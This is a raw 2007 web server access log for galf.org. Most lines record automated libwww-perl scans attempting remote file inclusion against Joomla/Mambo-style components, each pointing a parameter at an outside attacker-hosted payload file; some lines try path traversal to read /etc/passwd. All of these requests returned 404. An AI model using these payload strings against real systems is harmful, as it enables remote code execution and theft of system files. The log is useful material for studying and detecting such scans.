24.132.116.239 - - [23/Sep/2007:19:00:59 -0700] "GET /modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:19:01:00 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:19:01:39 -0700] "GET /logs/access_070827.log/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.16.82 - - [23/Sep/2007:19:03:03 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
67.18.16.82 - - [23/Sep/2007:19:03:03 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:19:03:23 -0700] "GET /logs/access_070618.log/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:19:03:23 -0700] "GET /modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:19:03:23 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.36.128.82 - - [23/Sep/2007:19:03:34 -0700] "GET /logs/access_070618.log/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:03:34 -0700] "GET /modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:03:34 -0700] "GET /logs/access_070618.log/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:03:34 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:03:34 -0700] "GET /modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:03:34 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:19:03:49 -0700] "GET /include.php?path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.214.68.207 - - [23/Sep/2007:19:03:51 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:19:03:52 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:04:21 -0700] "GET /logs/access_070827.log/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:04:23 -0700] "GET /logs/access_070827.log/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:19:04:44 -0700] "GET /logs/access_070827.log/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.25.146 - - [23/Sep/2007:19:05:27 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
72.36.128.82 - - [23/Sep/2007:19:05:35 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:05:35 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:05:35 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:05:35 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:05:35 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:05:35 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:05:49 -0700] "GET /logs/access_070827.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:05:49 -0700] "GET /logs/access_070827.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:19:06:14 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:19:06:14 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:19:06:14 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.37.50.43 - - [23/Sep/2007:19:06:15 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.37.50.43 - - [23/Sep/2007:19:06:16 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:06:50 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:07:00 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:07:00 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:07:18 -0700] "GET /logs/access_070826.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:07:18 -0700] "GET /logs/access_070826.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:19:07:24 -0700] "GET /logs/access_070910.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:07:24 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:07:28 -0700] "GET /logs/access_070910.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:07:29 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:07:35 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:07:37 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:07:37 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:07:37 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:08:12 -0700] "GET /logs/access_070910.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:08:22 -0700] "GET /logs/access_070910.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:09:13 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:09:13 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:09:14 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:09:18 -0700] "GET /logs/access_070910.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.20.17.177 - - [23/Sep/2007:19:09:30 -0700] "GET /logs/access.log/main.php?id=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.20.17.177 - - [23/Sep/2007:19:09:31 -0700] "GET /main.php?id=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.20.17.177 - - [23/Sep/2007:19:09:33 -0700] "GET /logs/main.php?id=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.20.17.177 - - [23/Sep/2007:19:09:57 -0700] "GET /logs/access_070806.log/main.php?id=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:10:22 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:10:23 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:10:23 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.113.190.221 - - [23/Sep/2007:19:10:52 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.113.190.221 - - [23/Sep/2007:19:10:53 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.113.190.221 - - [23/Sep/2007:19:10:53 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.113.190.221 - - [23/Sep/2007:19:11:14 -0700] "GET /logs/access_070827.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.144.158.163 - - [23/Sep/2007:19:11:18 -0700] "GET /logs/access.log/home.news.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:11:18 -0700] "GET /logs/access_070910.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
202.144.158.163 - - [23/Sep/2007:19:11:20 -0700] "GET /logs/access.log/home.viewrss.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.144.158.163 - - [23/Sep/2007:19:11:32 -0700] "GET /logs/access.log/home.viewdetails.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:19:12:03 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:19:12:03 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:12:17 -0700] "GET /logs/access_070910.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
202.144.158.163 - - [23/Sep/2007:19:12:28 -0700] "GET /logs/access.log/home.menu.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
213.246.39.80 - - [23/Sep/2007:19:12:40 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:12:46 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.28.112.58 - - [23/Sep/2007:19:12:47 -0700] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:12:51 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:19:13:10 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:19:13:11 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:19:13:57 -0700] "GET /logs/index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:19:13:58 -0700] "GET /index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
58.126.183.5 - - [23/Sep/2007:19:14:07 -0700] "GET /logs/index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:19:14:08 -0700] "GET /index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.126.183.5 - - [23/Sep/2007:19:14:43 -0700] "GET /logs/index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
58.126.183.5 - - [23/Sep/2007:19:14:43 -0700] "GET /index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.19.98.206 - - [23/Sep/2007:19:15:08 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.19.98.206 - - [23/Sep/2007:19:15:09 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:15:11 -0700] "GET /logs/access_070826.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:15:11 -0700] "GET /logs/access_070826.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:19:15:15 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:19:15:15 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
67.18.16.82 - - [23/Sep/2007:19:15:16 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.16.82 - - [23/Sep/2007:19:15:16 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.48.41.130 - - [23/Sep/2007:19:15:20 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.48.41.130 - - [23/Sep/2007:19:15:21 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:19:15:29 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:19:15:30 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:19:15:39 -0700] "GET /logs/access_070827.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:19:15:39 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:19:15:39 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:19:15:40 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
213.246.39.80 - - [23/Sep/2007:19:15:44 -0700] "GET /logs/access_070910.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:19:16:04 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.48.41.130 - - [23/Sep/2007:19:16:25 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.48.41.130 - - [23/Sep/2007:19:16:26 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
65.55.208.233 - - [23/Sep/2007:19:16:33 -0700] "GET /labia/?N=D HTTP/1.0" 200 508 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.18.16.82 - - [23/Sep/2007:19:16:39 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
24.132.116.239 - - [23/Sep/2007:19:16:55 -0700] "GET /logs/access_070827.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
